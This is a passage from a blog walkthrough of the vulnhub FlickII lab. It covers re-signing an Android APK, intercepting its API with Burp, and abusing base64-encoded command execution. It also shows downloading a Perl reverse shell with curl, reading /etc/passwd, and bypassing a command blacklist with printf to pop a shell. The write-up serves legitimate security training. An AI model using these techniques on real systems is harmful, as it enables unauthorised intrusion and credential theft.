  signing: res/drawable-xhdpi-v4/abc_ic_menu_paste_mtrl_am_alpha.png
  signing: res/drawable-xhdpi-v4/abc_ic_menu_selectall_mtrl_alpha.png
  signing: res/drawable-xhdpi-v4/abc_ic_menu_share_mtrl_alpha.png
  signing: res/drawable-xhdpi-v4/abc_ic_search_api_mtrl_alpha.png
  signing: res/drawable-xhdpi-v4/abc_ic_voice_search_api_mtrl_alpha.png
  signing: res/drawable-xhdpi-v4/abc_list_divider_mtrl_alpha.9.png
  signing: res/drawable-xhdpi-v4/abc_list_focused_holo.9.png
  signing: res/drawable-xhdpi-v4/abc_list_longpressed_holo.9.png
  signing: res/drawable-xhdpi-v4/abc_list_pressed_holo_dark.9.png
  signing: res/drawable-xhdpi-v4/abc_list_pressed_holo_light.9.png
  signing: res/drawable-xhdpi-v4/abc_list_selector_disabled_holo_dark.9.png
  signing: res/drawable-xhdpi-v4/abc_list_selector_disabled_holo_light.9.png
  signing: res/drawable-xhdpi-v4/abc_menu_hardkey_panel_mtrl_mult.9.png
  signing: res/drawable-xhdpi-v4/abc_popup_background_mtrl_mult.9.png
  signing: res/drawable-xhdpi-v4/abc_spinner_mtrl_am_alpha.9.png
  signing: res/drawable-xhdpi-v4/abc_switch_track_mtrl_alpha.9.png
  signing: res/drawable-xhdpi-v4/abc_tab_indicator_mtrl_alpha.9.png
  signing: res/drawable-xhdpi-v4/abc_textfield_activated_mtrl_alpha.9.png
  signing: res/drawable-xhdpi-v4/abc_textfield_default_mtrl_alpha.9.png
  signing: res/drawable-xhdpi-v4/abc_textfield_search_activated_mtrl_alpha.9.png
  signing: res/drawable-xhdpi-v4/abc_textfield_search_default_mtrl_alpha.9.png
  signing: res/drawable-xxhdpi-v4/abc_ab_share_pack_mtrl_alpha.9.png
  signing: res/drawable-xxhdpi-v4/abc_btn_check_to_on_mtrl_000.png
  signing: res/drawable-xxhdpi-v4/abc_btn_check_to_on_mtrl_015.png
  signing: res/drawable-xxhdpi-v4/abc_btn_radio_to_on_mtrl_000.png
  signing: res/drawable-xxhdpi-v4/abc_btn_radio_to_on_mtrl_015.png
  signing: res/drawable-xxhdpi-v4/abc_btn_rating_star_off_mtrl_alpha.png
  signing: res/drawable-xxhdpi-v4/abc_btn_rating_star_on_mtrl_alpha.png
  signing: res/drawable-xxhdpi-v4/abc_btn_switch_to_on_mtrl_00001.9.png
  signing: res/drawable-xxhdpi-v4/abc_btn_switch_to_on_mtrl_00012.9.png
  signing: res/drawable-xxhdpi-v4/abc_cab_background_top_mtrl_alpha.9.png
  signing: res/drawable-xxhdpi-v4/abc_ic_ab_back_mtrl_am_alpha.png
  signing: res/drawable-xxhdpi-v4/abc_ic_clear_mtrl_alpha.png
  signing: res/drawable-xxhdpi-v4/abc_ic_commit_search_api_mtrl_alpha.png
  signing: res/drawable-xxhdpi-v4/abc_ic_go_search_api_mtrl_alpha.png
  signing: res/drawable-xxhdpi-v4/abc_ic_menu_copy_mtrl_am_alpha.png
  signing: res/drawable-xxhdpi-v4/abc_ic_menu_cut_mtrl_alpha.png
  signing: res/drawable-xxhdpi-v4/abc_ic_menu_moreoverflow_mtrl_alpha.png
  signing: res/drawable-xxhdpi-v4/abc_ic_menu_paste_mtrl_am_alpha.png
  signing: res/drawable-xxhdpi-v4/abc_ic_menu_selectall_mtrl_alpha.png
  signing: res/drawable-xxhdpi-v4/abc_ic_menu_share_mtrl_alpha.png
  signing: res/drawable-xxhdpi-v4/abc_ic_search_api_mtrl_alpha.png
  signing: res/drawable-xxhdpi-v4/abc_ic_voice_search_api_mtrl_alpha.png
  signing: res/drawable-xxhdpi-v4/abc_list_divider_mtrl_alpha.9.png
  signing: res/drawable-xxhdpi-v4/abc_list_focused_holo.9.png
  signing: res/drawable-xxhdpi-v4/abc_list_longpressed_holo.9.png
  signing: res/drawable-xxhdpi-v4/abc_list_pressed_holo_dark.9.png
  signing: res/drawable-xxhdpi-v4/abc_list_pressed_holo_light.9.png
  signing: res/drawable-xxhdpi-v4/abc_list_selector_disabled_holo_dark.9.png
  signing: res/drawable-xxhdpi-v4/abc_list_selector_disabled_holo_light.9.png
  signing: res/drawable-xxhdpi-v4/abc_menu_hardkey_panel_mtrl_mult.9.png
  signing: res/drawable-xxhdpi-v4/abc_popup_background_mtrl_mult.9.png
  signing: res/drawable-xxhdpi-v4/abc_spinner_mtrl_am_alpha.9.png
  signing: res/drawable-xxhdpi-v4/abc_switch_track_mtrl_alpha.9.png
  signing: res/drawable-xxhdpi-v4/abc_tab_indicator_mtrl_alpha.9.png
  signing: res/drawable-xxhdpi-v4/abc_textfield_activated_mtrl_alpha.9.png
  signing: res/drawable-xxhdpi-v4/abc_textfield_default_mtrl_alpha.9.png
  signing: res/drawable-xxhdpi-v4/abc_textfield_search_activated_mtrl_alpha.9.png
  signing: res/drawable-xxhdpi-v4/abc_textfield_search_default_mtrl_alpha.9.png
  signing: res/drawable-xxxhdpi-v4/abc_btn_check_to_on_mtrl_000.png
  signing: res/drawable-xxxhdpi-v4/abc_btn_check_to_on_mtrl_015.png
  signing: res/drawable-xxxhdpi-v4/abc_btn_radio_to_on_mtrl_000.png
  signing: res/drawable-xxxhdpi-v4/abc_btn_radio_to_on_mtrl_015.png
  signing: res/drawable-xxxhdpi-v4/abc_btn_switch_to_on_mtrl_00001.9.png
  signing: res/drawable-xxxhdpi-v4/abc_btn_switch_to_on_mtrl_00012.9.png
  signing: res/drawable-xxxhdpi-v4/abc_ic_ab_back_mtrl_am_alpha.png
  signing: res/drawable-xxxhdpi-v4/abc_ic_clear_mtrl_alpha.png
  signing: res/drawable-xxxhdpi-v4/abc_ic_menu_copy_mtrl_am_alpha.png
  signing: res/drawable-xxxhdpi-v4/abc_ic_menu_cut_mtrl_alpha.png
  signing: res/drawable-xxxhdpi-v4/abc_ic_menu_moreoverflow_mtrl_alpha.png
  signing: res/drawable-xxxhdpi-v4/abc_ic_menu_paste_mtrl_am_alpha.png
  signing: res/drawable-xxxhdpi-v4/abc_ic_menu_selectall_mtrl_alpha.png
  signing: res/drawable-xxxhdpi-v4/abc_ic_menu_share_mtrl_alpha.png
  signing: res/drawable-xxxhdpi-v4/abc_ic_search_api_mtrl_alpha.png
  signing: res/drawable-xxxhdpi-v4/abc_ic_voice_search_api_mtrl_alpha.png
  signing: res/drawable-xxxhdpi-v4/abc_spinner_mtrl_am_alpha.9.png
  signing: res/drawable-xxxhdpi-v4/abc_switch_track_mtrl_alpha.9.png
  signing: res/drawable-xxxhdpi-v4/abc_tab_indicator_mtrl_alpha.9.png
  signing: res/drawable/abc_btn_check_material.xml
  signing: res/drawable/abc_btn_default_mtrl_shape.xml
  signing: res/drawable/abc_btn_radio_material.xml
  signing: res/drawable/abc_cab_background_internal_bg.xml
  signing: res/drawable/abc_cab_background_top_material.xml
  signing: res/drawable/abc_edit_text_material.xml
  signing: res/drawable/abc_item_background_holo_dark.xml
  signing: res/drawable/abc_item_background_holo_light.xml
  signing: res/drawable/abc_list_selector_background_transition_holo_dark.xml
  signing: res/drawable/abc_list_selector_background_transition_holo_light.xml
  signing: res/drawable/abc_list_selector_holo_dark.xml
  signing: res/drawable/abc_list_selector_holo_light.xml
  signing: res/drawable/abc_ratingbar_full_material.xml
  signing: res/drawable/abc_spinner_textfield_background_material.xml
  signing: res/drawable/abc_switch_thumb_material.xml
  signing: res/drawable/abc_tab_indicator_material.xml
  signing: res/drawable/abc_textfield_search_material.xml
  signing: res/layout-v11/abc_screen_content_include.xml
  signing: res/layout-v21/abc_screen_toolbar.xml
  signing: res/layout/abc_action_bar_title_item.xml
  signing: res/layout/abc_action_bar_up_container.xml
  signing: res/layout/abc_action_bar_view_list_nav_layout.xml
  signing: res/layout/abc_action_menu_item_layout.xml
  signing: res/layout/abc_action_menu_layout.xml
  signing: res/layout/abc_action_mode_bar.xml
  signing: res/layout/abc_action_mode_close_item_material.xml
  signing: res/layout/abc_activity_chooser_view.xml
  signing: res/layout/abc_activity_chooser_view_list_item.xml
  signing: res/layout/abc_expanded_menu_layout.xml
  signing: res/layout/abc_list_menu_item_checkbox.xml
  signing: res/layout/abc_list_menu_item_icon.xml
  signing: res/layout/abc_list_menu_item_layout.xml
  signing: res/layout/abc_list_menu_item_radio.xml
  signing: res/layout/abc_popup_menu_item_layout.xml
  signing: res/layout/abc_screen_content_include.xml
  signing: res/layout/abc_screen_simple.xml
  signing: res/layout/abc_screen_simple_overlay_action_mode.xml
  signing: res/layout/abc_screen_toolbar.xml
  signing: res/layout/abc_search_dropdown_item_icons_2line.xml
  signing: res/layout/abc_search_view.xml
  signing: res/layout/abc_simple_dropdown_hint.xml
  signing: res/layout/activity_command.xml
  signing: res/layout/activity_do_register.xml
  signing: res/layout/activity_main.xml
  signing: res/layout/activity_read_api_server.xml
  signing: res/layout/activity_register.xml
  signing: res/layout/support_simple_spinner_dropdown_item.xml
  signing: res/menu/menu_command.xml
  signing: res/menu/menu_do_register.xml
  signing: res/menu/menu_main.xml
  signing: res/menu/menu_read_api_server.xml
  signing: res/menu/menu_register.xml
  signing: res/mipmap-hdpi-v4/ic_launcher.png
  signing: res/mipmap-mdpi-v4/ic_launcher.png
  signing: res/mipmap-xhdpi-v4/ic_launcher.png
  signing: res/mipmap-xxhdpi-v4/ic_launcher.png
  signing: resources.arsc
jar signed.

Warning: 
No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-05-06) or after any future revocation date.

And now lets try installing it again:

MahcBook-Pro:temp sebastianbrabetz$ /path/to/Library/Android/sdk/platform-tools/adb install flick-hacked.apk 
803 KB/s (1110948 bytes in 1.350s)
	pkg: /data/local/tmp/flick-hacked.apk
Success

Awesome it worked!

Now lets try to MitM the App with burp:

first-mitm-connection

 

And lets take a look at burp:

first-mitm-connection2

Awesome it worked! We can now MitM the Programm and see it registering the Device!

We can now watch the Programs API Functioncalls:

free-in-app

And in burp:

free-in-burp

Now we can use “Action -> Send to Repeater” to interactively play with the API:

api-games

Nice!!!

Third Order of Business: From API to Shell!

You can read the sourcecode or easily guess that the app just base64 encodes the linux shell commands.

Lets try another one:

decoder-id

And execute it:

id-call

gotcha! Lets see if we can download my favorite Perl Reverse shell that comes with Kali on FlickII

First we need a simple webserver for hosting the perl file:

simple-http-server1

 

Now lets try to wget my shell:

wget-fail

command not found….

Lets try curl instead:

curl-decoder

And execute it:

curl-ok

*boom*

simple-http-server

Nice now I have placed my Perl-Reverseshell script on the Server!
Lets see if I can find it:

ls-decoder
And again execute:

ls-banned-command

 

Oh no! Banned command! Seems like the API blacklists certain commands!

Blacklisting however is always vulnerable, i just need to figure out a command that lets me  execute any blacklisted command!

After a bit of searching arround stackoverflow i learned that printf is this almighty creature!

It lets me list directories:

printf-ls-tmp1

 

printf-ls-tmp2

 

Oh nice, there is my shell!

printf lets me display the content of files using this sytnax:

 printf "%s" "$(</etc/passwd)"

printf-to-display-etcpasswd

And printf lets me execute it using this neat trick:

printf-execute-banned-commands

 

Lets try:

shooting-reverse-shell-using-printf

*boom* again:

we-got-shell

 

This feeling when the reverse shell pops! :-)

This Concludes the first part of the writeup!

Now I need to figure out the privesc and become root so i continue with part II of flick II

 

Thanks to:

@leonjza for providing this awesome VM + Android App!

@edskoudis and the entire SANS Team + everyone else that created and supported this years SANS Holiday Hack Challenge 2016!

If you want read up on this topics I recommend:

  1. This years Holiday Hack Challenge
  2. SANS Pen Test – How To’s: Manipulating Android Applications – Youtube Video
  3. Mining Android Secrets (Decoding Android App Resources)
  4. Joshua Wrigth’s presentation from HackFest 2016 on using Android Studio and JadX (PPTX)
  5. Bypassing Certificate Pinning on Android for fun and profit

Thanks for reading to the end!
Feel free to ask questions in the comments!

–> Continue to Part 2 of the Walkthrough Here <–

Merry Christmas!

BR
Sebastian

Advertisements

About SebastianB

read it in my blog
This entry was posted in boot2root, miscellaneous, vulnhub. Bookmark the permalink.

One Response to vulnhub: flickII – a different approach – walkthrough part1

  1. Pingback: vulnhub: flickII – to the root – walkthrough part2 | IT-Unsecurity

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s